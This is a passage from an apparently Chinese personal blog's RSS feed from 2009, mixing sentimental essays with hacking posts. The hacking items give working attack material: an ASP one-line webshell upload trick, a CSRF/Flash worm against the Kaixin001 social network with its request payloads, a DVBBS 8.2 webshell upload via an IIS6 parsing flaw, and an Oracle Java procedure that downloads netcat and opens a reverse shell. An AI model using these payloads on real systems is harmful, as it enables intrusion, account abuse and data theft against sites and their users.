aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&lt;%execute request(&#34;value&#34;)%&gt;<br/></div></div><br/>一句话代码前面要构造到256个字符，然后在ue里面把空格用\00代替，改下主机头啥的，NC提交，看到返回xxx bytes were read.的话，就成功了，目标文件夹下img/a.asp就是了，如果图片目录找不到或者不可执行啥的，可以用../什么的跳出来就好了，只要保证一句话前面刚好有256个字符就是了<br/>本地测试成功，大家遇到箱子信封什么的，就使劲的日吧！<br/><br/>某大牛用马甲发在T00ls的..非常强大!!桐子们 赶快偷信去...<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/wangran/88.htm</link>
			<title><![CDATA[一个小故事,看完很感动<转>]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[细语|人生]]></category>
			<pubDate>Mon,12 Oct 2009 21:46:13 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=88</guid>
		<description><![CDATA[阴雨天，顾客稀少，无所事事。 <br/>有人掀了珠帘进来，伞礼貌地收在门外。 <br/>很好看的女孩子，干净的面容，干净的眼神，干净的打扮。 <br/>说了声你好，便不再打搅她，让她自由地在店里挑选。 <br/>她仔细地将中意的小物品一一拿起，看片刻，小心地抚摩，又放下。我留意到，她总是先看价钱。 <br/>想必，经济不太好吧。 <br/>她最后选中了一款好看的时装表，一个精巧的小背包。有点出乎我的意料，那两件东西，价格都不算便宜。 <br/>要这两件吗？我不动声色。 <br/>有折扣吗？她小声问，有些羞涩，脸色浅红。 <br/>天气差，顾客少，难得你来，八折吧。做了两年的店主，这样的事，我轻松应对得来。 <br/>她犹豫了一下，但还是点了点头，没有再继续讨价还价，把东西递给我。 <br/>我习惯地拿过来包装，却被她阻止，她说，我先给你一些钱，你把它们放回原处，晚一会儿我再过来拿好吗？ <br/>我有些疑惑，但还是飞快应允，也有顾客会把东西预订下，交一点点订金。可我没想到，她交的订金，竟是全部价款的一多半。剩下的钱，不超过一百元。真是奇怪的女孩，既是这样，干吗不带走？ <br/>虽有疑惑，我并不多问，这是顾客的自由。既然她付了这么多钱，按惯例，自然要给她包好放起来，然后等她来取。 <br/>她却依旧阻止我，依旧小声说，先把它们放回原处好吗？眼神里，有几分请求。 <br/>我笑笑，点点头，仔细地把包包和手表重新放回原处。 <br/>谢谢你，我很快就过来。她的眼神欢快起来，到门边取了伞，很快消失在我的视野之外。 <br/>这个奇怪的女孩！ <br/>不久她又来了，但不是一个人，她的身后，跟了一个个子高高的男孩，气质和她真是登对。都是干干净净的面容，干干净净的眼神，穿棉质卡其色外套。 <br/>我刚要把她预付过大半货款的包包和手表取给她，她却似乎没看见我一样，转头拉着男孩的手说，我喜欢那个包包，看，就是那个红色的，好多兜兜的那个。说着，已经在我之前，把男孩拉到了那个包包前。 <br/>你喜欢就买。男孩伸手把包包取下来，边递给她边说，就是挺好看的。 <br/>她点着头，把包包抱在怀里，眼睛继续四下搜寻。 <br/>我沉住气不吭声，看她到底要做什么。 <br/>她装得跟真的一样，摸摸这个，看看那个。两分钟后，才&#34;惊喜&#34;地又看到了那只时装表。拿过来，转头，拉着男孩的胳膊撒娇，你说本命年的生日送我两件礼物的。 <br/>男孩的脸微微红了，小声说，当然，只要你喜欢。 <br/>她几乎雀跃着，拿着她早就选中的两件物品走到我跟前，问我，老板，多少钱？说着，背对男孩冲我眨眨眼睛。 <br/>我忽然明白过来，心头一暖，脱口说，你可真会挑，这两件，都是今天的特价品，然后我报出一个价钱来。 <br/>她回头看男孩。 <br/>男孩的脸更红了，轻轻推她，这么便宜，太便宜了，买别的吧，我有钱。 <br/>我就要它们。她把东西抱在怀里，我喜欢。声音任性起来，快付钱啊。 <br/>男孩显然习惯了顺从她的脾气。不再说话，慌忙从裤兜里掏出钱来，大概四五百块的样子，想必，是他准备好了给她买礼物的钱。 <br/>我笑笑，抽过一百元，找零时，顺手从身后拿过一对卡通情侣杯，说，所有过生日的顾客，如果在我们这里买了礼物，都有礼品赠送的。我把杯子塞到她怀里说，生日快乐。 <br/>因为高兴，她的脸顷刻涨红了，连声说着谢谢，男孩也跟着说，诚恳的口吻。 <br/>然后他们走了，她怀里抱着礼物，被他安全地拥在臂弯里。雨并不算小，他们共同撑了一把伞，但我知道，他们谁都不会淋湿，因为他们都把对方爱得那么好。 <br/>他爱她，那种宠爱溢于言表。她爱他，给他足够的自尊，且不让他知道。可以确定他们是一对贫穷的恋人，可物质的比重却在他们这样的情爱里，单薄得失去了任何分量。 <br/><br/>爱吗？爱多少？也不过这么多，不过是深爱着，且不让他知道]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/Safe/87.htm</link>
			<title><![CDATA[利用Fly_Flash蠕虫攻击开心网]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[网络|安全]]></category>
			<pubDate>Fri,09 Oct 2009 23:56:15 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=87</guid>
		<description><![CDATA[背景说明：开心网是SNS类型网站中做得非常成功的一个站点，拥有海量的用户群，提供的服务包括照片存储与分享、日记分享、短消息与在线聊天等沟通手段、休闲游戏、在线音乐播放分享等，而其本身对安全也相对于其他网站来说有较多关注。80sec发现开心网中的某些地方实现得并不好，存在一些安全漏洞，而某些安全漏洞却对于web安全非常具有代表性，在某些情况下可能造成比较大的影响，本次攻击测试即是对问题的简单证明，同时后续会给出处理此类问题时的解决方案。<br/><br/>漏洞分析：Flash在越来越多的网站得到广泛的应用，往往被用来播放视频，游戏或者是其他复杂的用户交互功能，但是在使用Flash的时候，大部分的网站处理的时候并没有想象中那么安全，譬如在开心网的发日记的地方使用Flash的方式如下：<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;embed allowscriptaccess=&#34;never&#34; height=384 width=454 src=http://www.80sec.com/x.swf wmode=&#34;transparent&#34; loop=&#34;false&#34; autostart=&#34;false&#34;&gt; </div></div><br/>开心网直接允许在页面引入其他域的Flash，同时为了安全性，在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用语法分析的方式来做过滤，无法被绕过，但是这里漏掉了一个重要的属性allowNetworking，利用这个属性flash可以通过浏览器做网络访问。<br/><br/>同时开心网另外一个严重的问题就是CSRF问题，尽管其在重要的数据更改的地方都限制只能使用POST方式提交，但是所有的请求数据内容可以被预知，很容易就实现CSRF攻击。而开心网用户之间的交互非常之多，利用一些简单的功能就可以实现将某些内容引诱其他用户访问，CSRF的固有的攻击的被动性可以得到有效的弥补。<br/>综合上面几点，我们就可以利用其中的漏洞主动的攻击开心网在线用户了。<br/><br/>技术实现：80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash，具体地址为<a href="http://www.80sec.com/fly_flash-0-1-release.html" target="_blank" rel="external">http://www.80sec.com/fly_flash-0-1-release.html</a>，利用Fly_Flash我们可以很方便的实现一次渗透测试，譬如在配置文件里写上<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"> 3,<a href="http://www.80sec.com/action.php?80sec" target="_blank" rel="external">http://www.80sec.com/action.php?80sec</a>,,,user=data&amp;pass=data</div></div><br/><br/>既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求，请求的内容为后面的user=data&amp;pass=data部分，并且整个请求不会受到浏览器的隐私策略的限制，可以同时使用持久Cookie和Session Cookie。<br/><br/>1 发布一个含有测试Flash的帖子，内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;embed allowscriptaccess=&#34;never&#34; height=384 width=454 src=http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&amp;x.swf wmode=&#34;transparent&#34; loop=&#34;false&#34; autostart=&#34;false&#34;&gt; </div></div><br/><br/>2 <a href="http://www.80sec.com/fly_flash.txt" target="_blank" rel="external">http://www.80sec.com/fly_flash.txt</a>内容是我们要构造的数据包请求，这里利用开心网的转贴功能实现内容在用户之间的传播<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">2,<a href="http://img.users.51.la/3182000.asp" target="_blank" rel="external">http://img.users.51.la/3182000.asp</a><br/>3,<a href="http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec" target="_blank" rel="external">http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec</a>,,,rtype=diary_773000_20569243&amp;word=&amp;do=succ&amp;commenttyp=1&amp;uid=&amp;touids=&amp;comment2src=1<br/>3,<a href="http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec" target="_blank" rel="external">http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec</a>,,,rtype=diary_773000_20570931&amp;word=&amp;do=succ&amp;commenttyp=1&amp;uid=&amp;touids=&amp;comment2src=1<br/>3,<a href="http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec" target="_blank" rel="external">http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec</a>,,,rtype=diary_773000_20567962&amp;word=&amp;do=succ&amp;commenttyp=1&amp;uid=&amp;touids=&amp;comment2src=1<br/>3,<a href="http://www.kaixin001.com/friend/addverify.php?80sec" target="_blank" rel="external">http://www.kaixin001.com/friend/addverify.php?80sec</a>,,,from=&amp;touid=773000&amp;content=hi+%0D%0A%3A%29&amp;rcode=&amp;code=&amp;usercode=&amp;email=&amp;bidirection= </div></div><br/><br/>其中2,<a href="http://img.users.51.la/3182000.asp" target="_blank" rel="external">http://img.users.51.la/3182000.asp</a>用作访问的统计，后面的就是自己构造的对<a href="http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php" target="_blank" rel="external">http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php</a>发起的POST请求，后面的数据就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴，一旦其他好友查看之后就会再次自动转贴，蠕虫实现了借助转贴功能的传播。<br/><br/>3 恩，结束，就这么简单。<br/><br/>来源：80SEC <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/exploit/86.htm</link>
			<title><![CDATA[关于DVBBS那个8.2版本的漏洞]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[漏洞|代码]]></category>
			<pubDate>Wed,30 Sep 2009 09:22:50 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=86</guid>
		<description><![CDATA[昨天看到某群一人丢出来，叫嚣的通杀DVBBS8.2的0day，有点无语。<br/>这个漏洞至少存在半年多了吧，我拿到手也有段时间了，没拿去搞多什么站，测试过几个用DVBBS的大站还是被我拿了SHELL，我一直放硬盘里都快烂了。<br/>oldjun 大牛激动的跟我说，终于被发出来了，都半年多了..<br/>严格的来说，这不算是DVBBS本身的漏洞。说到底算个BUG，但是配合IIS6的解析漏洞使用，就足已致命了。<br/><br/>利用方法如下：<br/>注册用户-我的主页-个人空间管理<br/>userspace.asp?sid=0&amp;act=modifyset<br/>然后编辑CSS风格-文件管理<br/>Dv_plus/myspace/script/filemange.asp<br/>上传 *.asp;*jpg<br/><br/>注意细节，先保存空间设置，然后随意修改CSS，再保存。页面出现乱码后，会有文件管理，点文件管理直接上传一个IIS6的解析漏洞的小马，格式123.asp;123.jpg 这样，直接访问地址就可以得到一个SHELL。<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/Safe/85.htm</link>
			<title><![CDATA[Linux下Oracle获取shell]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[网络|安全]]></category>
			<pubDate>Wed,23 Sep 2009 08:35:39 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=85</guid>
		<description><![CDATA[很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。<br/><br/>而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用简单 的方式获取Oracle的shell，即采用nc反弹的shell的方式。<br/><br/>1、Oracle数据库支持JAVA（如Windows下入侵一般）<br/><br/>2、通过Oracle客户端sqlplus，以sysdba用户登录（dbsnmp用户可提权至sysdba）<br/><br/>3、执行以下代码：<br/><br/>CODE_1:<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>cr&#101;ate o&#114; replace and resolve java source named &#34;oraexec&#34; as<br/>import java.lang.*;<br/>import java.io.*;<br/>public class o&#114;aexec<br/>{<br/>/*<br/>* Command execution module<br/>*/<br/>public static void execCommand(String command) throws IOException<br/>{<br/>Runtime.getRuntime().exec(command);<br/>}<br/><br/>/*<br/>* File reading module<br/>*/<br/>public static void readFile(String filename) throws IOException<br/>{<br/>FileReader f = new FileReader(filename);<br/>BufferedReader fr = new BufferedReader(f);<br/>String text = fr.readLine();<br/>while (text != null) {<br/>System.out.println(text);<br/>text = fr.readLine();<br/>}<br/>fr.close();<br/>}<br/><br/>/*<br/>* File writing module<br/>*/<br/>public static void writeFile(String filename, String line) throws IOException<br/>{<br/>FileWriter f = new FileWriter(filename, true); /* append */<br/>BufferedWriter fw = new BufferedWriter(f);<br/>fw.write(line);<br/>fw.write(&#34;\n&#34;);<br/>fw.close();<br/>}<br/>}<br/></div></div><br/>_______________________________________________________<br/>CODE_2:<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>-- usage: exec javacmd(&#39;command&#39;);<br/>cr&#101;ate o&#114; replace procedure javacmd(p_command varchar2) as<br/>language java<br/>name &#39;oraexec.execCommand(java.lang.String)&#39;;</div></div><br/>_______________________________________________________<br/>CODE_3:<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>-- usage: exec dbms_java.set_output(2000);<br/>--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;set serveroutput on;<br/>--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exec javareadfile(&#39;/path/to/file&#39;);<br/>cr&#101;ate o&#114; replace procedure javareadfile(p_filename in varchar2) as<br/>language java<br/>name &#39;oraexec.readFile(java.lang.String)&#39;;</div></div><br/>_______________________________________________________<br/><br/>CODE_4:<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://www.wangran.net/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>-- usage: exec javawritefile(&#39;/path/to/file&#39;, &#39;line to append&#39;);<br/>cr&#101;ate o&#114; replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as<br/>language java<br/>name &#39;oraexec.writeFile(java.lang.String, java.lang.String)&#39;;</div></div><br/><br/>4、<br/><br/>exec javawritefile(&#39;/tmp/getnc&#39;, &#39;wget <a href="http://www/nc" target="_blank" rel="external">http://www/nc</a> -O /tmp/nc&#39;);&nbsp;&nbsp;//写入wget nc 命令到文件getnc<br/><br/>exec dbms_java.set_output(2000);&nbsp;&nbsp; //设置javareadfile<br/><br/>set serveroutput on;<br/><br/>exec javareadfile(&#39;/tmp/getnc&#39;);&nbsp;&nbsp;//读取文件查看是否写入成功<br/><br/>exec javacmd(&#39;/bin/sh /tmp/getnc&#39;); //执行命令下载nc<br/><br/>exec javareadfile(&#39;/tmp/nc&#39;);&nbsp;&nbsp; //查看nc是否下载成功<br/><br/>exec javawritefile(&#39;/tmp/shell&#39;, &#39;/tmp/nc IP port -e /bin/sh&#39;); //写入反弹命令<br/><br/>exec javareadfile(&#39;/tmp/shell&#39;);&nbsp;&nbsp;//读取文件查看是否写入成功<br/><br/>exec javacmd(&#39;/bin/sh /tmp/shell&#39;); //执行nc反弹shell，在本地nc监听就能得到shell，如果不行，请确认防火墙<br/><br/><br/>作者：浅凝]]></description>
		</item>
		
			<item>
			<link>http://www.wangran.net/article/wangran/84.htm</link>
			<title><![CDATA[随笔..]]></title>
			<author>wangran@263.net(惘然)</author>
			<category><![CDATA[细语|人生]]></category>
			<pubDate>Tue,22 Sep 2009 00:22:07 +0800</pubDate>
			<guid>http://www.wangran.net/default.asp?id=84</guid>
		<description><![CDATA[时间的尽头是我的微笑，青春，已经越走越远。<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ——题记&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>过去的日子又在轮回,一些记忆里的画面,一副副闪过脑海,不知不觉又迷失于其中...<br/>一杯浓浓的茶,一个人发呆似的坐在电脑面前..面对一行行冰冷却又熟悉的代码,猛然间觉得陌生了起来..<br/><br/>尝试逃开一些人,忘记一些事,一段尘封太久的曾经.<br/>可是经常在午夜梦回之时,被回忆那张无边无际的大网所包围,那种心疼到极处的感觉,压迫的我快要窒息.<br/>为什么,我经常梦见你..带我去了一个陌生的地方,然后我面前出现一面玻璃,我能清晰的看得见你的身影,你一如既往的微笑,可是我始终都无法抓住你的手,感觉不到你手心带给我的温暖,你说&#34;我们都是迷途的孩子,偶然间的一次相聚,之后每个人都要去寻找自己回家的路.&#34;也许是的,一切有开始,便会有终结,生活如此,命运也如此,我们要走的路也如此&#34;<br/><br/>常常跟回忆较劲,跟自己较劲,我说我可以忘了你,可是老天给了我三年多的时间,我把自己封闭在一个陌生世界,不理会任何人,不关心任何事.我以为就这样可以慢慢的不去想起以前的那段时光,可是为什么每次深夜一个人对着电脑的时候,你的微笑就会继续浮现在我脑海里,于是我开始忧虑,开始焦躁,开始不安份,然后变得易怒,不可理喻,到最后,我又变得沉默,一个人对着冰冷的显示器发呆,那种没有任何思维的发呆,那种接近于死亡的发呆...脑海里的幻觉直接把我击成粉碎...<br/><br/>你说我还有未来吗?<br/>行走,我逃开这个地方,流浪,经常迷失于陌生城市的繁华夜空,经常大醉于高楼大厦的天台,冷着眼睛看这个光怪陆离的世界,那么的美丽,可是偏偏又如此残缺!!<br/>遇见过不同的人,看到过不同的事,我很想让我苍白的生活有那么一点颜色,其实我知道自己的浅薄,但是不知悔改...<br/><br/>渐行渐远,如此而已,即使知道万劫不复,却还义无反顾..原来深陷其中，并不需要透彻的懂得，只要坚持的继续...<br/><br/>请原谅我的懒惰，原谅我的不善言辞，原谅我的无常，亲爱的，原来我 一直就不曾知道什么是爱，却一直不停的给..<br/><br/>也许又一天我会就此老去，可是不会后悔,为什么??只是遗憾.....<br/>]]></description>
		</item>
		
</channel>
</rss>
